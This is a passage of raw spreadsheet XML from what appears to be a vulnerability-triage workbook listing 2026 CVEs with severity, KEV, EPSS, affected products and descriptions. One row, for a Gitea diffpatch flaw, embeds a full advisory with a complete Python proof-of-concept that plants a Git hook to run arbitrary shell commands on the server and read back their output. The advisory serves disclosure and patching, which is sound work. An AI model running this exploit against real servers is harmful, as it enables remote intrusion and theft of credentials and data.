xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1687" r:id="rId1686" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1688" r:id="rId1687" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1689" r:id="rId1688" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1690" r:id="rId1689" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1691" r:id="rId1690" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1692" r:id="rId1691" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1693" r:id="rId1692" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1694" r:id="rId1693" /></hyperlinks><pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5" /></worksheet>
</file>

<file path=xl/worksheets/sheet3.xml><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:T1679" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>Last Modified</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="T1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-84869</t></is></c><c r="D2" s="5" t="n"><v>9.9</v></c><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t></is></c><c r="G2" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H2" s="5" t="n"><v>0.007</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr"><is><t>connectwise:screenconnect</t></is></c><c r="L2" s="5" t="inlineStr" /><c r="M2" s="5" t="inlineStr" /><c r="N2" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q2" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="R2" s="5" t="inlineStr"><is><t>CWE-269, CWE-862</t></is></c><c r="S2" s="5" t="inlineStr"><is><t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t></is></c><c r="T2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-81963</t></is></c><c r="D3" s="5" t="n"><v>7.8</v></c><c r="E3" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G3" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H3" s="5" t="n"><v>0.006</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L3" s="5" t="inlineStr" /><c r="M3" s="5" t="inlineStr" /><c r="N3" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P3" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q3" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R3" s="5" t="inlineStr"><is><t>CWE-284, CWE-59</t></is></c><c r="S3" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-85880</t></is></c><c r="D4" s="5" t="n"><v>7.8</v></c><c r="E4" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G4" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H4" s="5" t="n"><v>0.006</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t></is></c><c r="L4" s="5" t="inlineStr" /><c r="M4" s="5" t="inlineStr" /><c r="N4" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q4" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R4" s="5" t="inlineStr"><is><t>CWE-122, CWE-908</t></is></c><c r="S4" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D5" s="5" t="inlineStr" /><c r="E5" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.868</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>Go:gitea.dev</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P5" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr" /><c r="S5" s="5" t="inlineStr"><is><t>### Summary

Gitea's `diffpatch` endpoint can be abused to install and execute a Git hook from repository-controlled content.

An attacker with ordinary write access to a repository can execute arbitrary shell commands as the Gitea OS user. With default open registration, an unauthenticated visitor can obtain the required write access by registering an account and creating a repository.

### Details

`services/repository/files/patch.go` applies attacker-controlled patches in a shared bare temporary clone:

```go
cmdApply := gitcmd.NewCommand("apply", "--index", "--recount", "--cached", "--binary")
if git.DefaultFeatures().CheckVersionAtLeast("2.32") {
    cmdApply.AddArguments("-3")
}
````

Submitting the same patch twice creates an add/add collision. Git's three-way fallback checks the indexed path out even though the operation is performed with `--cached`.

In a bare clone, the repository root is `$GIT_DIR`. As a result, an executable entry named:

```text
hooks/post-index-change
```

becomes a live Git hook.

Git invokes the hook while writing the index, allowing repository-controlled content to execute arbitrary commands as the Gitea service account.

The hook's return value is not propagated to the `diffpatch` response.

The attached PoC stores command output in Git objects and creates a branch containing the result, so no outbound connection is required. The result is fetched through authenticated smart HTTP.

### PoC

The supplied `gitea_diffpatch_rce_poc.py` uses an existing Gitea account. Run it against a test instance where the account can create a repository.

Set the account password:

```bash
export GITEA_PASSWORD='account-password'
```

Execute a command through the `diffpatch` chain:

```bash
python3 ./gitea_diffpatch_rce_poc.py \
  https://gitea.example \
  pocuser \
  'id; uname -srm; pwd'
```

The script:

* Creates an initialized private repository.
* Submits the same executable-hook patch twice.
* Fetches the result branch.
* Prints the command's combined stdout, stderr, and exit status.
* Prints the evidence repository, ref, and commit IDs to stderr.

Expected output resembles:

```text
uid=1000(git) gid=1000(git) groups=1000(git)
Linux ...
/data/gitea/tmp/...

[exit-status=0]
```

The trigger requires:

* Git 2.32 or newer.
* An enabled `diffpatch` route.
* A writable and executable temporary filesystem.

Open registration is required only for the no-prior-credentials attack path.

### Impact

This is remote command execution as the Gitea service account (`CWE-94`).

Depending on deployment isolation and the privileges of the Gitea OS user, successful exploitation may expose:

* `app.ini` and Gitea application secrets.
* Process environment secrets.
* Mounted repositories.
* Database credentials and database contents.
* OAuth and integration credentials.
* Other internal or externally reachable services.

With open registration enabled, the attack can be performed by an unauthenticated visitor after registering a normal account and creating a repository.


&lt;img width="928" height="687" alt="Screenshot 2026-07-25 at 14 45 44" src="https://github.com/user-attachments/assets/e7ce9fe7-bcab-4539-82fc-14c3856bda1c" /&gt;




```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Gitea RCE PoC – authorized testing only.
"""

from __future__ import annotations

import argparse
import base64
import getpass
import hashlib
import json
import os
from pathlib import Path

import secrets
import shlex
import shutil
import subprocess
import sys
import tempfile

from typing import Any
import urllib.error
import urllib.parse
import urllib.request


TIMEOUT    = 30.0
USER_AGENT = "gitea-rce-poc/2.0"

_RST  = "\033[0m"
_DIM  = "\033[2m"
_GRN  = "\033[38;5;46m"     # bright green
_RED  = "\033[31m"           # red for errors

def _g(t: str) -&gt; str: return f"{_GRN}{t}{_RST}"
def _r(t: str) -&gt; str: return f"{_RED}{t}{_RST}"
def _d(t: str) -&gt; str: return f"{_DIM}{t}{_RST}"

def log_star(msg: str) -&gt; None: print(f"{_g('[*]')} {_d(msg)}")
def log_ok  (msg: str) -&gt; None: print(f"{_g('[+]')} {_g(msg)}")
def log_err (msg: str) -&gt; None: print(f"{_r('[-]')} {_r(msg)}")


_SEP = "  " + "═" * 44
BANNER = f"{_SEP}\n  GITEA  REMOTE CODE EXECUTION  POC\n{_SEP}"

def print_banner(url: str, version: str | None = None,
                 command: str | None = None) -&gt; None:
    print()
    for line in BANNER.splitlines():
        print(_g(line))
    print()
    ver = version or "unknown"
    print(_g("  " + "-" * 54))
    print(_g(f"  Target        : {url}"))
    print(_g(f"  Version       : {ver}"))
    if command:
        print(_g(f"  Command       : {command}"))
    print(_g("  " + "-" * 54))
    print()

class PocError(RuntimeError):
    pass

class GiteaClient:
    def __init__(self, base_url: str, username: str, password: str) -&gt; None:
        parsed = urllib.parse.urlsplit(base_url)
        if parsed.scheme not in {"http", "https"} or not parsed.netloc:
            raise PocError("URL must be an absolute http:// or https:// URL")
        if parsed.query or parsed.fragment:
            raise PocError("URL must not contain a query string or fragment")
        self.base_url = base_url.rstrip("/")
        self.username = username
        self.password = password
        encoded = base64.b64encode(
            f"{username}:{password}".encode()
        ).decode("ascii")
        self.authorization = f"Basic {encoded}"

    def api(
        self,
        method: str,
        path: str,
        payload: dict[str, Any] | None = None,
    ) -&gt; tuple[int, Any]:
        data = None
        if payload is not None:
            data = json.dumps(payload, separators=(",", ":")).encode()
        req = urllib.request.Request(
            self.base_url + path,
            data=data,
            method=method,
            headers={
                "Accept": "application/json",
                "Authorization": self.authorization,
                "Content-Type": "application/json",
                "User-Agent": USER_AGENT,
            },
        )
        try:
            with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
                raw = r.read()
                return r.status, json.loads(raw) if raw else None
        except urllib.error.HTTPError as exc:
            body = exc.read().decode("utf-8", errors="replace")[:2_000]
            raise PocError(f"{method} {path} → HTTP {exc.code}: {body}") from exc
        except urllib.error.URLError as exc:
            raise PocError(f"{method} {path} failed: {exc.reason}") from exc
        except json.JSONDecodeError:
            raise PocError(f"{method} {path} returned invalid JSON")

def blob_oid(content: bytes) -&gt; str:
    return hashlib.sha1(
        f"blob {len(content)}\0".encode("ascii") + content
    ).hexdigest()

def build_hook(command: str, leak_ref: str) -&gt; bytes:
    qcmd = shlex.quote(command)
    qref = shlex.quote(f"refs/heads/{leak_ref}")
    return (
        "#!/bin/sh\n"
        'git_dir=$(git rev-parse --absolute-git-dir) || exit 1\n'
        'origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2\n'
        'case "$origin_objects" in\n'
        '  /*) ;;\n'
        '  *) origin_objects="$git_dir/objects/$origin_objects" ;;\n'
        "esac\n"
        'origin_git=${origin_objects%/objects}\n'
        '[ "$origin_git" != "$origin_objects" ] || exit 3\n'
        f"output_blob=$({{ /bin/sh -c {qcmd}; "
        'command_status=$?; printf "\\n[exit-status=%s]\\n" "$command_status"; } 2&gt;&amp;1 | '
        'git --git-dir="$origin_git" hash-object -w --stdin) || exit 4\n'
        'tree=$(printf "100644 blob %s\\toutput\\n" "$output_blob" | '
        'git --git-dir="$origin_git" mktree) || exit 5\n'
        'commit=$(printf "command output\\n" | '
        "GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@example.invalid "
        "GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@example.invalid "
        'git --git-dir="$origin_git" commit-tree "$tree") || exit 6\n'
        f'git --git-dir="$origin_git" update-ref {qref} "$commit" || exit 7\n'
        "exit 0\n"
    ).encode()

def build_patch(hook: bytes) -&gt; str:
    lc  = hook.count(b"\n")
    hdr = (
        "diff --git a/hooks/post-index-change b/hooks/post-index-change\n"
        "new file mode 100755\n"
        f"index {'0'*40}..{blob_oid(hook)}\n"
        "--- /dev/null\n"
        "+++ b/hooks/post-index-change\n"
        f"@@ -0,0 +1,{lc} @@\n"
    ).encode()
    return (hdr + b"".join(b"+" + l for l in hook.splitlines(keepends=True))).decode()

def run_git(git: str, arguments: list[str], env: dict[str, str]) -&gt; bytes:
    try:
        result = subprocess.run(
            [git, *arguments], env=env,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            check=False, timeout=TIMEOUT,
        )
    except subprocess.TimeoutExpired as exc:
        raise PocError(f"git timed out after {TIMEOUT:g}s") from exc
    except OSError as exc:
        raise PocError(f"could not run git: {exc}") from exc
    if result.returncode != 0:
        err = result.stderr.decode("utf-8", errors="replace")[:2_000].strip()
        raise PocError(f"git exit {result.returncode}: {err}")
    return result.stdout

def fetch_output(git: str, client: GiteaClient,
                 owner: str, repo: str, leak_ref: str) -&gt; bytes:
    remote = (
        f"{client.base_url}/"
        f"{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}.git"
    )
    with tempfile.TemporaryDirectory(prefix="gitea-poc-") as tmp:
        bare      = Path(tmp) / "fetch.git"
        auth_cfg  = Path(tmp) / "auth.config"
        fd = os.open(auth_cfg, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(f"[http]\n\textraHeader = Authorization: {client.authorization}\n")
        env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
        run_git(git, ["init", "--bare", "--quiet", str(bare)], env)
        run_git(git, [
            "-C", str(bare), "-c", f"include.path={auth_cfg}",
            "fetch", "--quiet", "--no-tags",
            remote, f"refs/heads/{leak_ref}",
        ], env)
        return run_git(git, ["-C", str(bare), "show", "FETCH_HEAD:output"], env)

def split_output(raw: bytes) -&gt; tuple[str, int | None]:
    text  = raw.decode("utf-8", errors="replace")
    lines = text.splitlines()
    status: int | None = None
    if lines:
        t = lines[-1].strip()
        if t.startswith("[exit-status=") and t.endswith("]"):
            try:    status = int(t[len("[exit-status="):-1])
            except ValueError: pass
            else:   lines.pop()
    return "\n".join(lines).rstrip("\n"), status


def parse_args() -&gt; argparse.Namespace:
    p = argparse.ArgumentParser(description="Gitea RCE PoC")
    p.add_argument("url",      help="Gitea base URL")
    p.add_argument("username", help="existing Gitea username")
    p.add_argument("command",  help="shell command to execute on target")
    return p.parse_args()


def main() -&gt; int:
    args = parse_args()
    if "\0" in args.command:
        raise PocError("command must not contain a NUL character")

    password = os.environ.get("GITEA_PASSWORD") or getpass.getpass(
        _g("[?]") + " password: "
    )
    if not password:
        raise PocError("password must not be empty")

    git = shutil.which("git")
    if git is None:
        raise PocError("git executable not found in PATH")

    client = GiteaClient(args.url, args.username, password)

    # version probe (pre-banner)
    log_star("probing target...")
    version: str | None = None
    try:
        r = urllib.request.Request(
            client.base_url + "/api/v1/version",
            headers={"Accept": "application/json", "User-Agent": USER_AGENT},
        )
        with urllib.request.urlopen(r, timeout=TIMEOUT) as resp:
            version = json.loads(resp.read()).get("version", "unknown")
    except Exception:
        version = "unknown"
    print_banner(client.base_url, version, args.command)

    log_star(f"target={client.base_url}  user={args.username}  cmd={args.command}")
    print()

    # step 1 – authenticate
    log_star("authenticating...")
    sc, acct = client.api("GET", "/api/v1/user")
    if sc != 200 or not isinstance(acct, dict):
        log_err("authentication failed"); raise PocError("auth failed")
    owner = acct.get("login")
    if not isinstance(owner, str) or not owner:
        log_err("no login in response"); raise PocError("no login")
    log_ok(f"logged in as {owner}  ({version})")

    # step 2 – create repo
    unique   = secrets.token_hex(5)
    repo     = f"test-repo-{unique}"
    leak_ref = f"output-{unique}"
    log_star("creating repository...")
    sc, _ = client.api("POST", "/api/v1/user/repos", {
        "name": repo, "private": True,
        "auto_init": True, "default_branch": "main",
        "object_format_name": "sha1",
    })
    if sc != 201:
        log_err("repo creation failed"); raise PocError("repo creation failed")
    log_ok(f"created repo {owner}/{repo}")

    # steps 3–4 – deliver payloads
    body = {
        "content": build_patch(build_hook(args.command, leak_ref)),
        "message": "initial commit",
        "branch": "main", "new_branch": "main",
    }
    ep = (
        f"/api/v1/repos/{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}/diffpatch"
    )
    commits: list[str] = []
    for cycle in (1, 2):
        log_star(f"delivering payload {cycle}/2...")
        sc, resp = client.api("POST", ep, body)
        try:
            commit = resp["commit"]["sha"]
        except (KeyError, TypeError) as exc:
            log_err(f"payload {cycle}/2 rejected")
            raise PocError(f"cycle {cycle} no commit") from exc
        if sc != 201:
            log_err(f"payload {cycle}/2 failed")
            raise PocError(f"cycle {cycle} failed")
        commits.append(commit)
        log_ok(f"payload {cycle}/2 accepted  commit={commit[:16]}")

    # step 5 – retrieve output
    log_star("retrieving output...")
    output = fetch_output(git, client, owner, repo, leak_ref)
    log_ok("operation complete")

    # command output
    cmd_out, exit_status = split_output(output)
    print()
    log_ok(f"{args.command}:")
    print(_g("---"))
    if cmd_out:
        for line in cmd_out.splitlines():
            print(_g(line))
    else:
        print(_d("&lt;no output&gt;"))
    print(_g("---"))
    if exit_status == 0:
        log_ok(f"exit status: {exit_status}")
    elif exit_status is None:
        log_star("exit status: unknown")
    else:
        log_err(f"exit status: {exit_status}")

    return 0


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PocError as exc:
        log_err(str(exc))
        raise SystemExit(1) from None

```</t></is></c><c r="T5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-44756</t></is></c><c r="D6" s="5" t="n"><v>10</v></c><c r="E6" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.003</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr" /><c r="M6" s="5" t="inlineStr" /><c r="N6" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q6" s="5" t="inlineStr" /><c r="R6" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S6" s="5" t="inlineStr"><is><t>A memory safety vulnerability exists in the Extended Passport Protocol (EPP) processing library. Under specific conditions, an unauthenticated attacker could exploit a crafted network request containing a malformed EPP header, potentially resulting in undefined behavior and abnormal program termination. Successful exploitation may have a high impact on the confidentiality, integrity, and availability of the application.</t></is></c><c r="T6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-82004</t></is></c><c r="D7" s="5" t="n"><v>10</v></c><c r="E7" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.014</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr"><is><t>adobe:campaign</t></is></c><c r="L7" s="5" t="inlineStr" /><c r="M7" s="5" t="inlineStr" /><c r="N7" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q7" s="5" t="inlineStr" /><c r="R7" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S7" s="5" t="inlineStr"><is><t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2026-12645</t></is></c><c r="D8" s="5" t="n"><v>9.9</v></c><c r="E8" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="n"><v>0.012</v></c><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr" /><c r="M8" s="5" t="inlineStr" /><c r="N8" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P8" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S8" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-12646</t></is></c><c r="D9" s="5" t="n"><v>9.9</v></c><c r="E9" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="n"><v>0.012</v></c><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr" /><c r="M9" s="5" t="inlineStr" /><c r="N9" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P9" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q9" s="5" t="inlineStr" /><c r="R9" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S9" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-12647</t></is></c><c r="D10" s="5" t="n"><v>9.9</v></c><c r="E10" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.012</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr" /><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr" /><c r="M10" s="5" t="inlineStr" /><c r="N10" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P10" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S10" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-12650</t></is></c><c r="D11" s="5" t="n"><v>9.9</v></c><c r="E11" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="n"><v>0.015</v></c><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr" /><c r="M11" s="5" t="inlineStr" /><c r="N11" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P11" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S11" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-19232</t></is></c><c r="D12" s="5" 